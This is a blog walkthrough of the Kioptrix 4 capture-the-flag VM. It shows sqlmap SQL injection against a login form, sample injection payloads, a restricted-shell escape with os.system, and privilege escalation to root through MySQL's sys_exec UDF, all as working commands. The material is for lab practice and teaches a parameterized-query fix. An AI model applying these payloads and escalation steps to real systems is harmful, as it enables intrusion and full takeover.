[Hacking series] – Kioptrix level 4

Written on June 11, 2015

Code name: Kioptrix4

Webpage: http://kioptrix.com/

VM Download: http://www.kioptrix.com/dlvm/Kioptrix4_vmware.rar

Challenge: Get root on the system

We are almost done with the Kioptrix challenges, so let's get started with this one. As usual, after locating the box on the network, we scan the VM with nmap:

[screenshot 1: nmap scan]

Two interesting ports show up: 22 (SSH) and 80 (web server). 139/445 (SMB) might be worth a look too, but let's focus on the first two.

Browsing to the web server, we find a login form:

[screenshot 2: login form on the web server]

This looks like a web app backed by an SQL database that lets a user log into the system. We can try to exploit the form with an SQL injection in one of its fields; sqlmap will do the job. Below, --data supplies the two POST fields with placeholder values so sqlmap knows where to inject, --level=5 --risk=5 enables every test payload sqlmap has, and --dbs asks it to enumerate the databases once an injection point is confirmed.
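To make the injection concrete before running sqlmap, here is an added example (not code from the original post) of what a tautology injection does to a login query. The query shape, the table name members and its columns are assumptions about the application on this box, chosen for illustration; the whole thing runs in any scratch MySQL database.

```sql
-- Added example, not from the original post. The app's real query is not
-- shown on the page; a concatenated login query of this shape is ASSUMED.
-- Constructed sample data:
CREATE TABLE members (id INT, username VARCHAR(32), password VARCHAR(64));
INSERT INTO members VALUES (1, 'john', 'secret'), (2, 'robert', 'pa55');

-- Vulnerable query as a PHP app builds it by string concatenation, with the
-- placeholder values handed to sqlmap above (user=p, password=a):
SELECT * FROM members WHERE username = 'p' AND password = 'a';
-- no rows: login denied

-- Same query after submitting password = a' OR '1'='1
-- AND binds tighter than OR, so this is (username='p' AND password='a') OR TRUE:
SELECT * FROM members WHERE username = 'p' AND password = 'a' OR '1'='1';
-- every row comes back; an app that just checks "did a row match" lets the
-- attacker in as the first user returned

-- Targeting a specific account instead, with username = john' --
-- Note the space after the double dash and the semicolon on its own line:
-- the injected comment swallows the rest of the query line, so a ';' on the
-- same line would be commented out and the mysql client would keep waiting.
SELECT * FROM members WHERE username = 'john' -- ' AND password = 'a'
;

-- Hardened form: bind the values instead of concatenating them. Shown here
-- as a MySQL server-side prepared statement; application code would use the
-- placeholder mechanism of its database API. The payload is now just text.
PREPARE login FROM 'SELECT * FROM members WHERE username = ? AND password = ?';
SET @u = 'p';
SET @p = 'a'' OR ''1''=''1';
EXECUTE login USING @u, @p;
-- no rows: the quote and the OR are compared literally against the column
DEALLOCATE PREPARE login;
```

sqmap's --level/--risk settings enumerate exactly these kinds of boolean and comment-terminated payloads against each field; the parameterized version is what the fix on the application side looks like.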

# sqlmap -u "http://192.168…" --data="user=p&password=a" --level=5 --risk=5 --dbs

[screenshot 3: sqlmap output]

sqlmap found a valid injection point, great! Now we can browse the server's databases:

[screenshot 4: database listing]

After digging a little, we found:

[screenshot 5: table contents]

Two valid logins found. Counting on password reuse, we try these credentials against the SSH server:

[screenshot 5.1: SSH login]

We are logged in, but we land in a very restricted shell that only permits a handful of commands. We can escape it with a small trick: echo is among the permitted commands, and the restricted shell is itself a Python program that ends up evaluating this line as Python rather than passing it to echo, so os.system() spawns a normal, unrestricted bash:

$ echo os.system('/bin/bash')

[screenshot 6: shell escape]

Great, we are out of the restricted shell. Now let's find our way to root. First we upgrade to a fully interactive shell using python:

[screenshot 7: interactive shell via python]

After exploring the system in depth, we find that a MySQL server is running on the box and that it accepts root logins without a password. That opens up another trick. First we make sure that lib_mysqludf_sys.so is present on the system: this UDF library provides functions (sys_exec among them) that execute shell commands from inside MySQL, which lets us do very interesting things.

[screenshot: lib_mysqludf_sys.so located]

It is! Now, using the following trick, we can run commands through sys_exec after logging into MySQL as root. Note that sys_exec runs the command with the privileges of the mysqld process (the OS user the daemon runs as), not those of the MySQL account; it hands us root here because the daemon itself runs as root, which the success of the next step confirms.

[screenshot 8: sys_exec via the mysql client]

With that, we added the user john to the admins group, whose members are allowed to use sudo, so we can now simply sudo to get root on the system:
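The full sequence typed into the mysql client, written out here as an added example rather than the post's own commands (the post only shows a screenshot). It assumes the sudo-capable group is named admin (the post refers to it as the admins group) and that lib_mysqludf_sys.so is in MySQL's plugin directory or on the system library path; sys_eval is a second function from the same library, used here only to check whose privileges we are running with.

```sql
-- Added example, not the original post's commands. Run as:
--   mysql -u root          (no password, as found on this box)
-- ASSUMPTIONS: the sudoers group is called `admin`; the library is loadable
-- by the server under the bare name lib_mysqludf_sys.so.

-- 1. Where does this server load UDF libraries from, and is anything already
--    registered? plugin_dir may be empty on old servers, in which case the
--    shared object is resolved through the normal system library path.
SHOW VARIABLES LIKE 'plugin_dir';
SELECT name, ret, dl FROM mysql.func;

-- 2. Register the functions if mysql.func did not list them.
--    (CREATE FUNCTION errors out if the name already exists; skip it then.)
CREATE FUNCTION sys_exec RETURNS INTEGER SONAME 'lib_mysqludf_sys.so';
CREATE FUNCTION sys_eval RETURNS STRING  SONAME 'lib_mysqludf_sys.so';

-- 3. Check whose privileges the commands get. This is the mysqld process
--    user, not the MySQL login; the trick only yields root if it prints uid=0.
SELECT sys_eval('id');

-- 4. Put john into the sudo group. sys_exec returns the command's exit
--    status, so 0 means usermod succeeded.
SELECT sys_exec('usermod -a -G admin john');
SELECT sys_eval('id john');   -- should now list the admin group

-- 5. Back in the SSH session: `sudo -s` (or `sudo su`) gives a root shell.
--    If sudo still refuses, log out and back in so the new group membership
--    is picked up by the session.
```

The point of step 3 is that the MySQL root account on its own does not give OS root; the UDF merely lets MySQL's OS user run commands. A server running as an unprivileged mysql user would still let you read and write files that user can touch, but not edit group membership.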

[screenshot 9: sudo]

Got root.

[screenshot 10: root shell]

Game over kioptrix4 P-)


Category : hacking series
